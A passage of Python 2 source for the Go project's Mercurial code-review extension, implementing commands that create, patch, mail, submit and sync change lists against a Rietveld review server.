 for line in text.split('\n'):
  # Status lines look like "<letter> <path>"; f[1] is the path.
  f = line.split()
  if len(f) > 1:
   if len(pats) > 0:
    # Given patterns, Mercurial shows relative to cwd
    p = to_slash(os.path.realpath(f[1]))
    if not p.startswith(prefix):
     print >>sys.stderr, "File %s not in repo root %s.\n" % (p, prefix)
    else:
     ret.append(p[len(prefix):])
   else:
    # Without patterns, Mercurial shows relative to root (what we want)
    ret.append(to_slash(f[1]))
 return ret
def hg_heads(ui, repo):
 # Return the captured text output of 'hg heads'.
 wrapper = uiwrap(ui)
 hg_commands.heads(ui, repo)
 return wrapper.output()
# Mercurial status lines that are not worth relaying to the user.
noise = [
 "",
 "resolving manifests",
 "searching for changes",
 "couldn't find merge tool hgmerge",
 "adding changesets",
 "adding manifests",
 "adding file changes",
 "all local heads known remotely",
]
def isNoise(line):
 # Report whether line is one of the known uninteresting Mercurial
 # status lines in the noise list.
 # Membership test replaces the original manual scan over the list.
 return str(line) in noise
def hg_incoming(ui, repo):
 # Run 'hg incoming' quietly; abort on hard errors (exit status other
 # than 0 or 1) and return the captured output.
 wrapper = uiwrap(ui)
 status = hg_commands.incoming(ui, repo, force=False, bundle="")
 if status and status != 1:
  raise hg_util.Abort(status)
 return wrapper.output()
def hg_log(ui, repo, **opts):
 # Run 'hg log' and return its captured output.
 # hg_commands.log expects these option keys to exist even when empty.
 for k in ['date', 'keyword', 'rev', 'user']:
  if k not in opts: # 'in' replaces the Python-2-only dict.has_key
   opts[k] = ""
 w = uiwrap(ui)
 ret = hg_commands.log(ui, repo, **opts)
 if ret:
  raise hg_util.Abort(ret)
 return w.output()
def hg_outgoing(ui, repo, **opts):
 # Run 'hg outgoing' quietly; abort on hard errors (exit status other
 # than 0 or 1) and return the captured output.
 wrapper = uiwrap(ui)
 status = hg_commands.outgoing(ui, repo, **opts)
 if status and status != 1:
  raise hg_util.Abort(status)
 return wrapper.output()
def hg_pull(ui, repo, **opts):
 # Run 'hg pull' with a verbose file list, rewriting Mercurial's
 # per-file status lines into a short mv/+/- notation.
 w = uiwrap(ui)
 ui.quiet = False
 ui.verbose = True # for file list
 err = hg_commands.pull(ui, repo, **opts)
 for line in w.output().split('\n'):
  if isNoise(line):
   continue
  if line.startswith('moving '):
   line = 'mv ' + line[len('moving '):]
  # The rename form 'getting X to Y' must be handled before the plain
  # 'getting X' form; after this rewrite the line starts with 'mv '.
  if line.startswith('getting ') and line.find(' to ') >= 0:
   line = 'mv ' + line[len('getting '):]
  if line.startswith('getting '):
   line = '+ ' + line[len('getting '):]
  if line.startswith('removing '):
   line = '- ' + line[len('removing '):]
  ui.write(line + '\n')
 return err
def hg_push(ui, repo, **opts):
 # Run 'hg push' verbosely, echoing every non-noise output line.
 wrapper = uiwrap(ui)
 ui.quiet = False
 ui.verbose = True
 err = hg_commands.push(ui, repo, **opts)
 for line in wrapper.output().split('\n'):
  if isNoise(line):
   continue
  ui.write(line + '\n')
 return err
def hg_commit(ui, repo, *pats, **opts):
 # Thin wrapper so all Mercurial interaction goes through this module.
 return hg_commands.commit(ui, repo, *pats, **opts)
#######################################################################
# Mercurial precommit hook to disable commit except through this interface.
# Set True only while this extension itself is performing a commit.
commit_okay = False
def precommithook(ui, repo, **opts):
 # Hook convention: returning False allows the commit, True blocks it.
 if hgversion >= "2.1":
  from mercurial import phases
  # NOTE(review): ui.config returns a string (or None) while
  # phases.secret is numeric; this mixed-type comparison relies on
  # Python 2 ordering semantics — confirm intent before porting.
  if repo.ui.config('phases', 'new-commit') >= phases.secret:
   return False
 if commit_okay:
  return False # False means okay.
 ui.write("\ncodereview extension enabled; use mail, upload, or submit instead of commit\n\n")
 return True
#######################################################################
# @clnumber file pattern support
# We replace scmutil.match with the MatchAt wrapper to add the @clnumber pattern.
# Saved state used by MatchAt; set once by InstallMatch.
match_repo = None
match_ui = None
match_orig = None
def InstallMatch(ui, repo):
 # Monkey-patch scmutil.match so '@NNNNNN' patterns expand to the files
 # of that CL (see MatchAt).
 global match_repo
 global match_ui
 global match_orig
 match_ui = ui
 match_repo = repo
 from mercurial import scmutil
 match_orig = scmutil.match
 scmutil.match = MatchAt
def MatchAt(ctx, pats=None, opts=None, globbed=False, default='relpath'):
 # Replacement for scmutil.match: expands each '@clnumber' pattern into
 # explicit 'path:' patterns for that CL's files, then delegates to the
 # saved original matcher (match_orig).
 taken = []
 files = []
 pats = pats or []
 opts = opts or {}
 for p in pats:
  if p.startswith('@'):
   taken.append(p)
   clname = p[1:]
   if clname == "default":
    # '@default' means the changed files not claimed by any CL.
    files = DefaultFiles(match_ui, match_repo, [])
   else:
    if not GoodCLName(clname):
     raise hg_util.Abort("invalid CL name " + clname)
    cl, err = LoadCL(match_repo.ui, match_repo, clname, web=False)
    if err != '':
     raise hg_util.Abort("loading CL " + clname + ": " + err)
    if not cl.files:
     raise hg_util.Abort("no files in CL " + clname)
    files = Add(files, cl.files)
 # Replace the '@...' patterns with the expanded per-file patterns.
 pats = Sub(pats, taken) + ['path:'+f for f in files]
 # work-around for http://selenic.com/hg/rev/785bbc8634f8
 if not hasattr(ctx, 'match'):
  ctx = ctx[None]
 return match_orig(ctx, pats=pats, opts=opts, globbed=globbed, default=default)
#######################################################################
# Commands added by code review extension.
def hgcommand(f):
 # Identity decorator: marks f as a user-visible hg command.
 return f
#######################################################################
# hg change
@hgcommand
def change(ui, repo, *pats, **opts):
 """create, edit or delete a change list
 Create, edit or delete a change list.
 A change list is a group of files to be reviewed and submitted together,
 plus a textual description of the change.
 Change lists are referred to by simple alphanumeric names.
 Changes must be reviewed before they can be submitted.
 In the absence of options, the change command opens the
 change list for editing in the default editor.
 Deleting a change with the -d or -D flag does not affect
 the contents of the files listed in that change. To revert
 the files listed in a change, use
  hg revert @123456
 before running hg change -d 123456.
 """
 if codereview_disabled:
  raise hg_util.Abort(codereview_disabled)
 # dirty collects CLs that need to be flushed back to disk.
 dirty = {}
 if len(pats) > 0 and GoodCLName(pats[0]):
  # Operating on an existing CL named by the first argument.
  name = pats[0]
  if len(pats) != 1:
   raise hg_util.Abort("cannot specify CL name and file patterns")
  pats = pats[1:]
  cl, err = LoadCL(ui, repo, name, web=True)
  if err != '':
   raise hg_util.Abort(err)
  if not cl.local and (opts["stdin"] or not opts["stdout"]):
   raise hg_util.Abort("cannot change non-local CL " + name)
 else:
  # Creating a new CL from the changed files matching pats.
  name = "new"
  cl = CL("new")
  if repo[None].branch() != "default":
   raise hg_util.Abort("cannot create CL outside default branch; switch with 'hg update default'")
  dirty[cl] = True
  files = ChangedFiles(ui, repo, pats, taken=Taken(ui, repo))
 if opts["delete"] or opts["deletelocal"]:
  # -d deletes everywhere; -D deletes only the local copy.
  if opts["delete"] and opts["deletelocal"]:
   raise hg_util.Abort("cannot use -d and -D together")
  flag = "-d"
  if opts["deletelocal"]:
   flag = "-D"
  if name == "new":
   raise hg_util.Abort("cannot use "+flag+" with file patterns")
  if opts["stdin"] or opts["stdout"]:
   raise hg_util.Abort("cannot use "+flag+" with -i or -o")
  if not cl.local:
   raise hg_util.Abort("cannot change non-local CL " + name)
  if opts["delete"]:
   if cl.copied_from:
    raise hg_util.Abort("original author must delete CL; hg change -D will remove locally")
   PostMessage(ui, cl.name, "*** Abandoned ***", send_mail=cl.mailed)
   EditDesc(cl.name, closed=True, private=cl.private)
  cl.Delete(ui, repo)
  return
 if opts["stdin"]:
  # -i: read a CL description from stdin instead of invoking an editor.
  s = sys.stdin.read()
  clx, line, err = ParseCL(s, name)
  if err != '':
   raise hg_util.Abort("error parsing change list: line %d: %s" % (line, err))
  if clx.desc is not None:
   cl.desc = clx.desc;
   dirty[cl] = True
  if clx.reviewer is not None:
   cl.reviewer = clx.reviewer
   dirty[cl] = True
  if clx.cc is not None:
   cl.cc = clx.cc
   dirty[cl] = True
  if clx.files is not None:
   cl.files = clx.files
   dirty[cl] = True
  if clx.private != cl.private:
   cl.private = clx.private
   dirty[cl] = True
 if not opts["stdin"] and not opts["stdout"]:
  # Interactive path: open the CL in the editor.
  if name == "new":
   cl.files = files
  err = EditCL(ui, repo, cl)
  if err != "":
   raise hg_util.Abort(err)
  dirty[cl] = True
 for d, _ in dirty.items():
  name = d.name
  d.Flush(ui, repo)
  if name == "new":
   d.Upload(ui, repo, quiet=True)
 if opts["stdout"]:
  ui.write(cl.EditorText())
 elif opts["pending"]:
  ui.write(cl.PendingText())
 elif name == "new":
  if ui.quiet:
   ui.write(cl.name)
  else:
   ui.write("CL created: " + cl.url + "\n")
 return
#######################################################################
# hg code-login (broken?)
@hgcommand
def code_login(ui, repo, **opts):
 """log in to code review server
 Logs in to the code review server, saving a cookie in
 a file in your home directory.
 """
 if codereview_disabled:
  raise hg_util.Abort(codereview_disabled)
 # A request with no payload, issued purely to trigger authentication.
 MySend(None)
#######################################################################
# hg clpatch / undo / release-apply / download
# All concerned with applying or unapplying patches to the repository.
@hgcommand
def clpatch(ui, repo, clname, **opts):
 """import a patch from the code review server
 Imports a patch from the code review server into the local client.
 If the local client has already modified any of the files that the
 patch modifies, this command will refuse to apply the patch.
 Submitting an imported patch will keep the original author's
 name as the Author: line but add your own name to a Committer: line.
 """
 if repo[None].branch() != "default":
  raise hg_util.Abort("cannot run hg clpatch outside default branch")
 # Shared implementation with undo/release-apply; see clpatch_or_undo.
 err = clpatch_or_undo(ui, repo, clname, opts, mode="clpatch")
 if err:
  raise hg_util.Abort(err)
@hgcommand
def undo(ui, repo, clname, **opts):
 """undo the effect of a CL
 Creates a new CL that undoes an earlier CL.
 After creating the CL, opens the CL text for editing so that
 you can add the reason for the undo to the description.
 """
 if repo[None].branch() != "default":
  raise hg_util.Abort("cannot run hg undo outside default branch")
 # Shared implementation with clpatch/release-apply; see clpatch_or_undo.
 err = clpatch_or_undo(ui, repo, clname, opts, mode="undo")
 if err:
  raise hg_util.Abort(err)
@hgcommand
def release_apply(ui, repo, clname, **opts):
 """apply a CL to the release branch
 Creates a new CL copying a previously committed change
 from the main branch to the release branch.
 The current client must either be clean or already be in
 the release branch.
 The release branch must be created by starting with a
 clean client, disabling the code review plugin, and running:
  hg update weekly.YYYY-MM-DD
  hg branch release-branch.rNN
  hg commit -m 'create release-branch.rNN'
  hg push --new-branch
 Then re-enable the code review plugin.
 People can test the release branch by running
  hg update release-branch.rNN
 in a clean client. To return to the normal tree,
  hg update default
 Move changes since the weekly into the release branch
 using hg release-apply followed by the usual code review
 process and hg submit.
 When it comes time to tag the release, record the
 final long-form tag of the release-branch.rNN
 in the *default* branch's .hgtags file. That is, run
  hg update default
 and then edit .hgtags as you would for a weekly.
 """
 c = repo[None]
 if not releaseBranch:
  raise hg_util.Abort("no active release branches")
 if c.branch() != releaseBranch:
  # Switch to the release branch, but only from a clean client.
  if c.modified() or c.added() or c.removed():
   raise hg_util.Abort("uncommitted local changes - cannot switch branches")
  err = hg_clean(repo, releaseBranch)
  if err:
   raise hg_util.Abort(err)
 try:
  err = clpatch_or_undo(ui, repo, clname, opts, mode="backport")
  if err:
   raise hg_util.Abort(err)
 except Exception, e:
  # On any failure, return the client to the default branch.
  hg_clean(repo, "default")
  raise e
def rev2clname(rev):
 # Extract CL name from revision description.
 # The last line in the description that is a codereview URL is the real one.
 # Earlier lines might be part of the user-written description.
 matches = re.findall('(?m)^https?://codereview.appspot.com/([0-9]+)$', rev.description())
 if matches:
  return matches[-1]
 return ""
# Templates wrapped around the original CL description by clpatch_or_undo.
undoHeader = """undo CL %s / %s
<enter reason for undo>
««« original CL description
"""
undoFooter = """
»»»
"""
backportHeader = """[%s] %s
««« CL %s / %s
"""
# NOTE(review): backportFooter is identical text to undoFooter; the
# backport path in clpatch_or_undo actually uses undoFooter, which is
# harmless only because the strings match.
backportFooter = """
»»»
"""
# Implementation of clpatch/undo.
def clpatch_or_undo(ui, repo, clname, opts, mode):
 # Shared implementation for clpatch, undo, and release-apply ("backport").
 # Returns an error string on failure; falls off the end on success.
 if codereview_disabled:
  return codereview_disabled
 if mode == "undo" or mode == "backport":
  # Find revision in Mercurial repository.
  # Assume CL number is 7+ decimal digits.
  # Otherwise is either change log sequence number (fewer decimal digits),
  # hexadecimal hash, or tag name.
  # Mercurial will fall over long before the change log
  # sequence numbers get to be 7 digits long.
  if re.match('^[0-9]{7,}$', clname):
   found = False
   for r in hg_log(ui, repo, keyword="codereview.appspot.com/"+clname, limit=100, template="{node}\n").split():
    rev = repo[r]
    # Last line with a code review URL is the actual review URL.
    # Earlier ones might be part of the CL description.
    n = rev2clname(rev)
    if n == clname:
     found = True
     break
   if not found:
    return "cannot find CL %s in local repository" % clname
  else:
   rev = repo[clname]
   if not rev:
    return "unknown revision %s" % clname
   clname = rev2clname(rev)
   if clname == "":
    return "cannot find CL name in revision description"
  # Create fresh CL and start with patch that would reverse the change.
  vers = hg_node.short(rev.node())
  cl = CL("new")
  desc = str(rev.description())
  if mode == "undo":
   cl.desc = (undoHeader % (clname, vers)) + desc + undoFooter
  else:
   # NOTE(review): uses undoFooter here too; backportFooter is
   # byte-identical, so the output is unchanged.
   cl.desc = (backportHeader % (releaseBranch, line1(desc), clname, vers)) + desc + undoFooter
  v1 = vers
  v0 = hg_node.short(rev.parents()[0].node())
  # undo diffs new->old (reversing); backport diffs old->new.
  if mode == "undo":
   arg = v1 + ":" + v0
  else:
   vers = v0
   arg = v0 + ":" + v1
  patch = RunShell(["hg", "diff", "--git", "-r", arg])
 else: # clpatch
  cl, vers, patch, err = DownloadCL(ui, repo, clname)
  if err != "":
   return err
  if patch == emptydiff:
   return "codereview issue %s has no diff" % clname
 # find current hg version (hg identify)
 ctx = repo[None]
 parents = ctx.parents()
 id = '+'.join([hg_node.short(p.node()) for p in parents])
 # if version does not match the patch version,
 # try to update the patch line numbers.
 if vers != "" and id != vers:
  # "vers in repo" gives the wrong answer
  # on some versions of Mercurial. Instead, do the actual
  # lookup and catch the exception.
  try:
   repo[vers].description()
  except:
   return "local repository is out of date; sync to get %s" % (vers)
  patch1, err = portPatch(repo, patch, vers, id)
  if err != "":
   if not opts["ignore_hgapplydiff_failure"]:
    return "codereview issue %s is out of date: %s (%s->%s)" % (clname, err, vers, id)
  else:
   patch = patch1
 # Apply the patch with the external hgapplydiff tool.
 argv = ["hgapplydiff"]
 if opts["no_incoming"] or mode == "backport":
  argv += ["--checksync=false"]
 try:
  cmd = subprocess.Popen(argv, shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=None, close_fds=sys.platform != "win32")
 except:
  return "hgapplydiff: " + ExceptionDetail() + "\nInstall hgapplydiff with:\n$ go get code.google.com/p/go.codereview/cmd/hgapplydiff\n"
 out, err = cmd.communicate(patch)
 if cmd.returncode != 0 and not opts["ignore_hgapplydiff_failure"]:
  return "hgapplydiff failed"
 cl.local = True
 # hgapplydiff prints the files it touched, one per whitespace-separated token.
 cl.files = out.strip().split()
 if not cl.files and not opts["ignore_hgapplydiff_failure"]:
  return "codereview issue %s has no changed files" % clname
 files = ChangedFiles(ui, repo, [])
 extra = Sub(cl.files, files)
 if extra:
  ui.warn("warning: these files were listed in the patch but not changed:\n\t" + "\n\t".join(extra) + "\n")
 cl.Flush(ui, repo)
 if mode == "undo":
  # Let the user record the reason for the undo.
  err = EditCL(ui, repo, cl)
  if err != "":
   return "CL created, but error editing: " + err
  cl.Flush(ui, repo)
 else:
  ui.write(cl.PendingText() + "\n")
# portPatch rewrites patch from being a patch against
# oldver to being a patch against newver.
def portPatch(repo, patch, oldver, newver):
 # Returns (newpatch, err); err is "" on success. Hunk headers are
 # shifted by the line-number deltas the file accumulated between
 # oldver and newver (see fileDeltas/lineDelta).
 lines = patch.splitlines(True) # True = keep \n
 delta = None
 for i in range(len(lines)):
  line = lines[i]
  if line.startswith('--- a/'):
   # New file section: recompute its deltas.
   file = line[6:-1]
   delta = fileDeltas(repo, file, oldver, newver)
  if not delta or not line.startswith('@@ '):
   continue
  # @@ -x,y +z,w @@ means the patch chunk replaces
  # the original file's line numbers x up to x+y with the
  # line numbers z up to z+w in the new file.
  # Find the delta from x in the original to the same
  # line in the current version and add that delta to both
  # x and z.
  m = re.match('@@ -([0-9]+),([0-9]+) \+([0-9]+),([0-9]+) @@', line)
  if not m:
   # Consistent error contract: always ("", err) on failure
   # (the original returned None here but "" below).
   return "", "error parsing patch line numbers"
  n1, len1, n2, len2 = int(m.group(1)), int(m.group(2)), int(m.group(3)), int(m.group(4))
  d, err = lineDelta(delta, n1, len1)
  if err != "":
   return "", err
  n1 += d
  n2 += d
  lines[i] = "@@ -%d,%d +%d,%d @@\n" % (n1, len1, n2, len2)
 newpatch = ''.join(lines)
 return newpatch, ""
# fileDelta returns the line number deltas for the given file's
# changes from oldver to newver.
# The deltas are a list of (n, len, newdelta) triples that say
# lines [n, n+len) were modified, and after that range the
# line numbers are +newdelta from what they were before.
def fileDeltas(repo, file, oldver, newver):
 cmd = ["hg", "diff", "--git", "-r", oldver + ":" + newver, "path:" + file]
 output = RunShell(cmd, silent_ok=True)
 hunk_re = re.compile(r'@@ -([0-9]+),([0-9]+) \+([0-9]+),([0-9]+) @@')
 deltas = []
 for line in output.splitlines():
  m = hunk_re.match(line)
  if m is None:
   continue
  n1, len1, n2, len2 = [int(g) for g in m.groups()]
  deltas.append((n1, len1, n2 + len2 - (n1 + len1)))
 return deltas
# lineDelta finds the appropriate line number delta to apply to the lines [n, n+len).
# It returns an error if those lines were rewritten by the patch.
def lineDelta(deltas, n, len):
 # deltas is a list of (start, length, newdelta) from fileDeltas:
 # lines [start, start+length) were modified and lines after that range
 # shift by newdelta. Returns (delta, err); err non-empty on conflict.
 d = 0
 for (old, oldlen, newdelta) in deltas:
  if old >= n+len:
   break
  # Overlap test must use the modified range's own length (oldlen).
  # The original compared old+len (the query chunk's length), which
  # missed conflicts with long modified ranges starting before n.
  if old+oldlen > n:
   return 0, "patch and recent changes conflict"
  d = newdelta
 return d, ""
@hgcommand
def download(ui, repo, clname, **opts):
 """download a change from the code review server
 Download prints a description of the given change list
 followed by its diff, downloaded from the code review server.
 """
 if codereview_disabled:
  raise hg_util.Abort(codereview_disabled)
 cl, vers, patch, err = DownloadCL(ui, repo, clname)
 if err != "":
  return err
 # Print the editable CL text followed by the raw patch.
 ui.write(cl.EditorText() + "\n")
 ui.write(patch + "\n")
 return
#######################################################################
# hg file
@hgcommand
def file(ui, repo, clname, pat, *pats, **opts):
 """assign files to or remove files from a change list
 Assign files to or (with -d) remove files from a change list.
 The -d option only removes files from the change list.
 It does not edit them or remove them from the repository.
 """
 if codereview_disabled:
  raise hg_util.Abort(codereview_disabled)
 pats = tuple([pat] + list(pats))
 if not GoodCLName(clname):
  return "invalid CL name " + clname
 # dirty collects CLs that need to be flushed back to disk.
 dirty = {}
 cl, err = LoadCL(ui, repo, clname, web=False)
 if err != '':
  return err
 if not cl.local:
  return "cannot change non-local CL " + clname
 files = ChangedFiles(ui, repo, pats)
 if opts["delete"]:
  # -d: remove the matched files from the CL.
  oldfiles = Intersect(files, cl.files)
  if oldfiles:
   if not ui.quiet:
    # Print commands that would re-add the files.
    ui.status("# Removing files from CL. To undo:\n")
    ui.status("# cd %s\n" % (repo.root))
    for f in oldfiles:
     ui.status("# hg file %s %s\n" % (cl.name, f))
   cl.files = Sub(cl.files, oldfiles)
   cl.Flush(ui, repo)
  else:
   ui.status("no such files in CL")
  return
 if not files:
  return "no such modified files"
 files = Sub(files, cl.files)
 taken = Taken(ui, repo)
 warned = False
 for f in files:
  if f in taken:
   # Moving f out of another CL; show how to undo.
   if not warned and not ui.quiet:
    ui.status("# Taking files from other CLs. To undo:\n")
    ui.status("# cd %s\n" % (repo.root))
    warned = True
   ocl = taken[f]
   if not ui.quiet:
    ui.status("# hg file %s %s\n" % (ocl.name, f))
   if ocl not in dirty:
    ocl.files = Sub(ocl.files, files)
    dirty[ocl] = True
 cl.files = Add(cl.files, files)
 dirty[cl] = True
 for d, _ in dirty.items():
  d.Flush(ui, repo)
 return
#######################################################################
# hg gofmt
@hgcommand
def gofmt(ui, repo, *pats, **opts):
 """apply gofmt to modified files
 Applies gofmt to the modified files in the repository that match
 the given patterns.
 """
 if codereview_disabled:
  raise hg_util.Abort(codereview_disabled)
 files = ChangedExistingFiles(ui, repo, pats, opts)
 files = gofmt_required(files)
 if not files:
  ui.status("no modified go files\n")
  return
 cwd = os.getcwd()
 files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
 try:
  # --list just reports files; otherwise gofmt rewrites them in place.
  cmd = ["gofmt", "-l"]
  if not opts["list"]:
   cmd += ["-w"]
  if subprocess.call(cmd + files) != 0:
   raise hg_util.Abort("gofmt did not exit cleanly")
 except hg_error.Abort, e:
  raise
 except:
  raise hg_util.Abort("gofmt: " + ExceptionDetail())
 return
def gofmt_required(files):
 # Select the .go files that gofmt should process: everything except
 # files under test/, though test/bench/ files are still included.
 required = []
 for f in files:
  if not f.endswith('.go'):
   continue
  if f.startswith('test/') and not f.startswith('test/bench/'):
   continue
  required.append(f)
 return required
#######################################################################
# hg mail
@hgcommand
def mail(ui, repo, *pats, **opts):
 """mail a change for review
 Uploads a patch to the code review server and then sends mail
 to the reviewer and CC list asking for a review.
 """
 if codereview_disabled:
  raise hg_util.Abort(codereview_disabled)
 cl, err = CommandLineCL(ui, repo, pats, opts, op="mail", defaultcc=defaultcc)
 if err != "":
  raise hg_util.Abort(err)
 cl.Upload(ui, repo, gofmt_just_warn=True)
 if not cl.reviewer:
  # If no reviewer is listed, assign the review to defaultcc.
  # This makes sure that it appears in the
  # codereview.appspot.com/user/defaultcc
  # page, so that it doesn't get dropped on the floor.
  if not defaultcc:
   raise hg_util.Abort("no reviewers listed in CL")
  # Drop defaultcc from cc now that they are the reviewer.
  cl.cc = Sub(cl.cc, defaultcc)
  cl.reviewer = defaultcc
  cl.Flush(ui, repo)
 if cl.files == []:
  raise hg_util.Abort("no changed files, not sending mail")
 cl.Mail(ui, repo)
#######################################################################
# hg p / hg pq / hg ps / hg pending
@hgcommand
def ps(ui, repo, *pats, **opts):
	"""alias for hg p --short
	"""
	# Force the short listing, then delegate to pending.
	opts['short'] = True
	return pending(ui, repo, *pats, **opts)
@hgcommand
def pq(ui, repo, *pats, **opts):
	"""alias for hg p --quick
	"""
	# Skip the codereview-server round trip, then delegate to pending.
	opts['quick'] = True
	return pending(ui, repo, *pats, **opts)
@hgcommand
def pending(ui, repo, *pats, **opts):
	"""show pending changes
	Lists pending changes followed by a list of unassigned but modified files.
	"""
	if codereview_disabled:
		raise hg_util.Abort(codereview_disabled)
	quick = opts.get('quick', False)
	short = opts.get('short', False)
	# Consulting the codereview server is slow; skip it for --quick/--short.
	m = LoadAllCL(ui, repo, web=not quick and not short)
	names = m.keys()
	names.sort()
	for name in names:
		cl = m[name]
		if short:
			ui.write(name + "\t" + line1(cl.desc) + "\n")
		else:
			ui.write(cl.PendingText(quick=quick) + "\n")
	if short:
		return 0
	# Also report modified files that are not assigned to any CL.
	files = DefaultFiles(ui, repo, [])
	if len(files) > 0:
		s = "Changed files not in any CL:\n"
		for f in files:
			s += "\t" + f + "\n"
		ui.write(s)
#######################################################################
# hg submit
# Abort helper used when the local repository is behind the remote.
def need_sync():
	raise hg_util.Abort("local repository out of date; must sync before submit")
@hgcommand
def submit(ui, repo, *pats, **opts):
	"""submit change to remote repository
	Submits change to remote repository.
	Bails out if the local repository is not in sync with the remote one.
	"""
	if codereview_disabled:
		raise hg_util.Abort(codereview_disabled)
	# We already called this on startup but sometimes Mercurial forgets.
	set_mercurial_encoding_to_utf8()
	if not opts["no_incoming"] and hg_incoming(ui, repo):
		need_sync()
	cl, err = CommandLineCL(ui, repo, pats, opts, op="submit", defaultcc=defaultcc)
	if err != "":
		raise hg_util.Abort(err)
	# For a copied (clpatch'ed) CL, credit the original author.
	user = None
	if cl.copied_from:
		user = cl.copied_from
	userline = CheckContributor(ui, repo, user)
	typecheck(userline, str)
	# Build the R=/TBR=/CC= trailer appended to the commit message.
	about = ""
	if cl.reviewer:
		about += "R=" + JoinComma([CutDomain(s) for s in cl.reviewer]) + "\n"
	if opts.get('tbr'):
		tbr = SplitCommaSpace(opts.get('tbr'))
		cl.reviewer = Add(cl.reviewer, tbr)
		about += "TBR=" + JoinComma([CutDomain(s) for s in tbr]) + "\n"
	if cl.cc:
		about += "CC=" + JoinComma([CutDomain(s) for s in cl.cc]) + "\n"
	if not cl.reviewer:
		raise hg_util.Abort("no reviewers listed in CL")
	if not cl.local:
		raise hg_util.Abort("cannot submit non-local CL")
	# upload, to sync current patch and also get change number if CL is new.
	if not cl.copied_from:
		cl.Upload(ui, repo, gofmt_just_warn=True)
	# check gofmt for real; allowed upload to warn in order to save CL.
	cl.Flush(ui, repo)
	CheckFormat(ui, repo, cl.files)
	about += "%s%s\n" % (server_url_base, cl.name)
	if cl.copied_from:
		about += "\nCommitter: " + CheckContributor(ui, repo, None) + "\n"
	typecheck(about, str)
	if not cl.mailed and not cl.copied_from:	# in case this is TBR
		cl.Mail(ui, repo)
	# submit changes locally
	message = cl.desc.rstrip() + "\n\n" + about
	typecheck(message, str)
	set_status("pushing " + cl.name + " to remote server")
	if hg_outgoing(ui, repo):
		raise hg_util.Abort("local repository corrupt or out-of-phase with remote: found outgoing changes")
	old_heads = len(hg_heads(ui, repo).split())
	# Committing is normally blocked by the precommit hook;
	# commit_okay lets it through just for this commit.
	global commit_okay
	commit_okay = True
	ret = hg_commit(ui, repo, *['path:'+f for f in cl.files], message=message, user=userline)
	commit_okay = False
	if ret:
		raise hg_util.Abort("nothing changed")
	node = repo["-1"].node()
	# push to remote; if it fails for any reason, roll back
	try:
		new_heads = len(hg_heads(ui, repo).split())
		if old_heads != new_heads and not (old_heads == 0 and new_heads == 1):
			# Created new head, so we weren't up to date.
			need_sync()
		# Push changes to remote. If it works, we're committed. If not, roll back.
		try:
			if hg_push(ui, repo):
				raise hg_util.Abort("push error")
		except hg_error.Abort, e:
			if e.message.find("push creates new heads") >= 0:
				# Remote repository had changes we missed.
				need_sync()
			raise
		except urllib2.HTTPError, e:
			print >>sys.stderr, "pushing to remote server failed; do you have commit permissions?"
			raise
	except:
		# Undo the local commit so the working copy matches the remote again.
		real_rollback()
		raise
	# We're committed. Upload final patch, close review, add commit message.
	changeURL = hg_node.short(node)
	url = ui.expandpath("default")
	# Recognize Google Code hosting URLs so the posted message can link
	# straight to the submitted revision.
	m = re.match("(^https?://([^@/]+@)?([^.]+)\.googlecode\.com/hg/?)" + "|" +
		"(^https?://([^@/]+@)?code\.google\.com/p/([^/.]+)(\.[^./]+)?/?)", url)
	if m:
		if m.group(1): # prj.googlecode.com/hg/ case
			changeURL = "https://code.google.com/p/%s/source/detail?r=%s" % (m.group(3), changeURL)
		elif m.group(4) and m.group(7): # code.google.com/p/prj.subrepo/ case
			changeURL = "https://code.google.com/p/%s/source/detail?r=%s&repo=%s" % (m.group(6), changeURL, m.group(7)[1:])
		elif m.group(4): # code.google.com/p/prj/ case
			changeURL = "https://code.google.com/p/%s/source/detail?r=%s" % (m.group(6), changeURL)
		else:
			print >>sys.stderr, "URL: ", url
	else:
		print >>sys.stderr, "URL: ", url
	pmsg = "*** Submitted as " + changeURL + " ***\n\n" + message
	# When posting, move reviewers to CC line,
	# so that the issue stops showing up in their "My Issues" page.
	PostMessage(ui, cl.name, pmsg, reviewers="", cc=JoinComma(cl.reviewer+cl.cc))
	if not cl.copied_from:
		EditDesc(cl.name, closed=True, private=cl.private)
	cl.Delete(ui, repo)
	# If the working copy is a now-clean release branch, switch back to default.
	c = repo[None]
	if c.branch() == releaseBranch and not c.modified() and not c.added() and not c.removed():
		ui.write("switching from %s to default branch.\n" % releaseBranch)
		err = hg_clean(repo, "default")
		if err:
			return err
	return 0
#######################################################################
# hg sync
@hgcommand
def sync(ui, repo, **opts):
	"""synchronize with remote repository
	Incorporates recent changes from the remote repository
	into the local repository.
	"""
	if codereview_disabled:
		raise hg_util.Abort(codereview_disabled)
	if not opts["local"]:
		# Pull and update from the remote unless --local was given.
		err = hg_pull(ui, repo, update=True)
		if err:
			return err
	sync_changes(ui, repo)
def sync_changes(ui, repo):
	"""Close local CLs that were submitted remotely; prune stale CL file lists."""
	# Look through recent change log descriptions to find
	# potential references to http://.*/our-CL-number.
	# Double-check them by looking at the Rietveld log.
	for rev in hg_log(ui, repo, limit=100, template="{node}\n").split():
		desc = repo[rev].description().strip()
		for clname in re.findall('(?m)^https?://(?:[^\n]+)/([0-9]+)$', desc):
			if IsLocalCL(ui, repo, clname) and IsRietveldSubmitted(ui, clname, repo[rev].hex()):
				ui.warn("CL %s submitted as %s; closing\n" % (clname, repo[rev]))
				cl, err = LoadCL(ui, repo, clname, web=False)
				if err != "":
					ui.warn("loading CL %s: %s\n" % (clname, err))
					continue
				if not cl.copied_from:
					EditDesc(cl.name, closed=True, private=cl.private)
				cl.Delete(ui, repo)
	# Remove files that are not modified from the CLs in which they appear.
	all = LoadAllCL(ui, repo, web=False)
	changed = ChangedFiles(ui, repo, [])
	for cl in all.values():
		extra = Sub(cl.files, changed)
		if extra:
			ui.warn("Removing unmodified files from CL %s:\n" % (cl.name,))
			for f in extra:
				ui.warn("\t%s\n" % (f,))
			cl.files = Sub(cl.files, extra)
			cl.Flush(ui, repo)
		if not cl.files:
			if not cl.copied_from:
				ui.warn("CL %s has no files; delete (abandon) with hg change -d %s\n" % (cl.name, cl.name))
			else:
				ui.warn("CL %s has no files; delete locally with hg change -D %s\n" % (cl.name, cl.name))
	return 0
#######################################################################
# hg upload
@hgcommand
def upload(ui, repo, name, **opts):
	"""upload diffs to the code review server
	Uploads the current modifications for a given change to the server.
	"""
	if codereview_disabled:
		raise hg_util.Abort(codereview_disabled)
	# Quiet Mercurial so only the CL URL printed below appears.
	repo.ui.quiet = True
